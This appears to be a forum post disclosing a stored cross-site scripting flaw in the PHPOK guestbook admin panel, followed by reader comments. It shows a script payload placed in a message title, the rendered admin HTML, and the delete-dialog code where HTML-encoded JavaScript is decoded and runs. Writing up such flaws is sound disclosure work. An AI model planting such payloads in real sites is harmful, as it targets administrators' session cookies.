PHPOK留言管理XSS(打管理员)
测试环境:
当在 在线留言 处留言:
留言成功后需要管理员审核才可以通过,所以不能立刻显示,当管理员登陆后台,删除该留言的时候,触发XSS:
看下源码:
<tr id="list_1283" title="留言主题:<script>alert(document.cookie);</script> 发布日期:2014-04-11 20:54:04">
<td class="center"><input type="checkbox" name="ids[]" id="id_1283" value="1283" /></td>
<td><span class="status0" id="status_1283" onclick="set_status(1283)" value="0"></span></td>
<td><label for="id_1283">
1283. <script>alert(document.cookie);</script> </label>
</td>
<td class="center">2014-04-11</td>
<td>evil</td>
<td>[email protected]</td>
<td>test</td>
<td class="center"><input type="text" id="sort_1283" name="sort[]" class="short center" value="0" tabindex="1" /></td>
<td>
<a class="icon edit" href="admin.php?c=list&f=edit&id=1283" title="修改"></a>
<a class="icon delete end" onclick="content_del('1283','<script>alert(document.cookie);</script>')" title="删除"></a>
</td>
</tr><a class="icon delete end" onclick="content_del('1283','<script>alert(document.cookie);</script>')" title="删除"></a>函数在 list.js 这个文件中,关键代码如下:
$.dialog.confirm("确定要删除:<span class='red'>"+title+"</span>?<br />删除后是不能恢复的?",function(){<script>alert(document.cookie);</script>经过HtmlEncode的数据,但是由于htmlpersar解析是优先于jspersar的,所以单单对js事件进行htmlencode的话,经过浏览器的解析,编码的事件请求内容就会被解码,从而产生XSS。。。
最后,初到论坛,露个脸,求几个TuBi~
关于作者
评论14次
每次看人xss都有种很巧妙的感觉....
很强大 谢谢分享
好强大... “回复支持HTML哟!” ...
试试怎么样!不知道其他的版本有没有这个
都分析代码了,赞
好漂亮,竟然在要删除的时候促发了,所以说,代码要写就要认真写,不然就不要画蛇添足!
@三只小潴HK 鼓励2个tubi因为你首发不是t00ls如果是首发t00ls Rank+1 tubi+5
额,好吧,下次再甩的时候就首发吧。。。
感谢分享!!!
@三只小潴HK 鼓励2个tubi 因为你首发不是t00ls 如果是首发t00ls Rank+1 tubi+5
好吧 这个洞比较喜欢
不错的文章
好强大... “回复支持HTML哟!” ...
我觉得有点坑,他说支持HTML,但是我用HTML测试,就加个<a>标签,都不能显示,不知道是不是坑我的。。。
好强大... “回复支持HTML哟!” ...